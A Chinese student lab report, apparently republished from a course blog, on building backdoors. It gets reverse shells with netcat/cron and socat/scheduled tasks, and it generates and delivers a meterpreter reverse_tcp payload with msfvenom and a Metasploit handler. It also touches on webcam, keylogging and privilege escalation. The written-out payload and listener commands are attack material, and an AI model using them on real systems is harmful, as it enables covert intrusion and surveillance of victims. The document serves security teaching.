码迷,mamicode.com
首页 > 其他好文 > 详细

NF_Exp2_20164306

时间:2019-03-24 09:26:26      阅读:100      评论:0      收藏:0      [点我收藏+]

标签:技术   tle   实现   soc   ipc   监听   不同   内存   执行文件   

后门原理与实践

1 关键内容

使用 netcat 获取主机操作 Shell,cron 启动

使用 socat 获取主机操作 Shell, 任务计划启动

使用 MSF meterpreter 生成可执行文件,利用 ncat 传送到主机并运行获取主机 Shell

使用 MSF meterpreter 生成获取目标主机音频、摄像头、击键记录,并尝试提权

2 基础问题回答

例举你能想到的一个后门进入到你系统中的可能方式?

浏览挂马网页

下载恶意软件

打开可疑优盘

例举你知道的后门如何启动起来的方式?

修改注册表项,开机自启动

设定启动周期,定时启动

开启监听,满足特定条件后反弹启动

Meterpreter有哪些给你映像深刻的功能?

可以简化任务创建多个会话

工作模式是纯内存的,难以监测,不留痕迹

如何发现自己的系统有没有被安装后门?

跟踪可疑进程

检查注册表项

更新病毒库并及时查看杀毒软件的提示信息

3 Win 获得 Linux Shell (netcat ,cron 启动)

 实验用 Win 选择 XP 系统

下载 netcat 并解压,关闭防火墙

技术图片

kali 关闭防火墙

  ufw disable 

windows 打开监听

技术图片

查看 windows IP

  ipconfig

 

技术图片

在 kali 环境下使用 vim 编写定时任务

 crontab -e

将编写格式 mark 如下

技术图片

3 月 23 日 21 时 33 分反弹连接,发送 shell

技术图片

 xp 获得 kali shell

技术图片

4 Linux 获得 Win Shell(socat ,任务计划启动)

windows 添加计划任务

开始→控制面板→性能和维护→计划任务→添加计划任务

涉及到组策略调整或用户密码设置

技术图片

添加参数,重定向命令行

技术图片

技术图片

kali 连接

技术图片

出现乱码的原因是二者使用不同的中文编码方式

5 MSF meterpreter 相关(完成传输,实现攻击,获取信息)

 查看 kali IP

  ifconfig

技术图片

使用 meterpreter 生成后门程序

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.176.130 LPORT=4306 -f exe > 20164306.exe

kali 向本地端口发送文件 

  nc -l 4306 < 20164306.exe

windows 从 kali 处接收文件

  nc.exe 192.168.176.131 4306 > 20164306.exe

技术图片

进入 msfconsole 进行相关设置

  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST 192.168.176.130
  set LPORT 4306

技术图片

开启监听

  exploit

运行 Windows 上的后门程序后,kali 得到了控制权

技术图片

控制摄像头的相关指令,一般情况下,使用前首先使用 list 检查是否有可用设备

技术图片

获取音频截屏键盘记录提权啥的类似输指令浪就完事了,以下是实验结果

技术图片

技术图片

技术图片

6 总结与感悟

除了实验中尝试的后门实现方法,网页后门、账号后门、C/S后门也是常用的攻击手段

实际生活中用于搜集信息的一些反馈错误程序、调查提交程序实质上与后门无异,它们会控制主机自动连接其它设备并进行数据交互

我们需要认识到后门的危险性,积极防范,警惕上述程序被攻击者利用

NF_Exp2_20164306

标签:技术   tle   实现   soc   ipc   监听   不同   内存   执行文件   

原文地址:https://www.cnblogs.com/besti-white/p/10581338.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!